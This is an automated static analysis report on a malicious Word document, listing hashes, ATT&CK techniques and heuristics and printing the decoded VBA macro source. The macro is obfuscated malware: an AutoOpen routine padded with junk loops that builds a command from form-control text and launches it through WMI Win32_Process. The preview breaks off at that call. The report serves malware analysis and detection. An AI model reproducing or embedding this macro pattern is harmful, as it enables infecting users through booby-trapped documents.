Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f0f86903255f88f4…

MALICIOUS

Office (OLE)

Size: 139.4 KB
Created: 2019-05-08 08:22:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: e2ca9597d4f74344b9020ce7ee94d4b7
SHA-1: cbfd43b77becfd8156e2b1f98352f97dd9f14d7d
SHA-256: f0f86903255f88f4d0a80355d0dcc331e0f33f32b30505115fcd4727e91bbf33
Risk Score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1137.001 Office Application Startup
  • T1218.011 Signed Binary Proxy Execution: Rundll32

The sample contains VBA macros with an autoopen function, indicating it attempts to execute code upon opening. The critical heuristic firing for 'OLE_VBA_WMI_PROCESS_CREATE' and the obfuscated string 'winmgmts:' strongly suggest the macro uses WMI to launch a process. This is a common technique for downloading and executing further malicious payloads.

Heuristics (8)

  • ClamAV: Doc.Malware.00536d-6965367-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6965367-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  6984 bytes
SHA-256: 84c663c34477df16dacaeab6a8a5fc6075247ed83f24890ab223b8594cdc6c6c

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "M246162"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "W75171"
Attribute VB_Base = "0{5232B8A3-B181-49D8-B532-74C75EEFF060}{C67784F5-0991-4AE8-8B93-3A450D366215}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "C853284"

Attribute VB_Name = "U_739739"

Attribute VB_Name = "C59766_9"
Attribute VB_Base = "0{58074626-F754-4CCA-9482-D9A559A3D037}{BE9925B2-ABCD-49CE-BA27-219726281349}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "J899695"
Function G6805488(w88186)
         While w73229 And c74_9_7_
'L504_29k48804V648212_E6_71612
'f82448r_57823l14856U3243794
'm4_567Y46994R186329X4374739
      Wend
         While z077967 And u3086_34
'r0_68_j08200z_031404f767569
'Y_40876z84117_3O61841Y1635422
'D286624d60821I54195q494_0_8
      Wend
Set G6805488 = CVar(w88186)
         While s71981 And w_02_79
'L63293f11358C1_419j0_19033
'c6411448E4648_07F6456049q0562701
'A484945r_8509s63_75M__221
      Wend
         While R9611599 And q00264
'q29039Y6_80116S472351N4154__
'z66802_3J90592_1t4935_75l_51609
'X3_6497P3506_17R06623U00_44
      Wend
         While f8352986 And S_66670
'W421220U042811l53667b6225_
'N757233E24336N295_07_V961038
'j126256q041932E490827Z14269
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While s593013 And o227891
'D45002J5398385Y_571948n7402393
'c86_0020Z36_6_95b34_371W554340
'm3767_3W43541R469408X1037864
      Wend
         While r808959_ And T54637
'O63359X25455I_325318f158418
'Q774247_M0_0543l1665_2p9471734
'D003526M142838G3511039s471074
      Wend
         While V_9250_ And j62651
'v_46472D_4310_R257382z3866_8
'd02473_9A7721182o750_2d6564_58
'd2858551i69975U3567236L894987
      Wend
Call d68418
         While i1139474 And F3_325
'z5437_0B93666W79403F8226_1
'L4856245d_87961t2220953Z18694
'q_650790E576330I07107Y06_4793
      Wend
         While l802_574 And h4649831
'w6_07727w58387w954803b1530_09
'v654_739L721713r283777F69660
'c66951l0048985f349853p0824366
      Wend
         While I9870_ And N_021392
'v445_268T6714_9G__83752r4769_
'n06233m50915_B_810613N9_019_1
'A98280c35547u_0460M9960_1
      Wend
End Sub


Attribute VB_Name = "w43741"
Function d68418()
On Error Resume Next
         While w62_5640 And b53910
'c782552s81982I2870_67f163117
'P0180755W044__97i2699697A3647125
'Y65_3948M595224O0905834u0490329
      Wend
         While Z62_702 And G13439_6
'Z5257027S_09522b28817i67413
'A4172648H35_181i99202E_24931
'E4110147n85038z43366_3H4_563
      Wend
         While i02497_ And K2_2865_
'H3278661i67522T053347u38475
'P63503U3866_6f36_1917p992193
'A368090f0_967_3O93087f2793103
      Wend
G83379 = W75171.j55255_.ControlTipText + C59766_9.M14_9569 + W75171.j55255_.ControlTipText + C59766_9.u00857 + W75171.j55255_ + W75171.j55255_.PasswordChar + C59766_9.Y_01297 + W75171.j55255_.ControlTipText + W75171.j55255_.PasswordChar + C59766_9.Z7730103 + W75171.j55255_.ControlSource + C59766_9.T9553_ + W75171.j55255_.PasswordChar
         While Q504951_ And b456_64
'c58206A4374568c6__61X76240
'H573_03j6_2__X9717_87u3__53
'B11183p6806885n776_8S6182867
      Wend
         While a51576 And k541304
'M__167l296866j584125_I6452968
'K_9100F1004630M972689_i8207678
'X2850_1t23685E624068w139064
      Wend
         While V6562518 And z6766073
'n26788R658_146v_8349j7681832
'B99584b477217D76999G38685
'B6636450b21561J686310D929088
      Wend
Set w52_15 = G6805488(GetObject("winmg" + "mts:W" + "in32_Proc
... (truncated)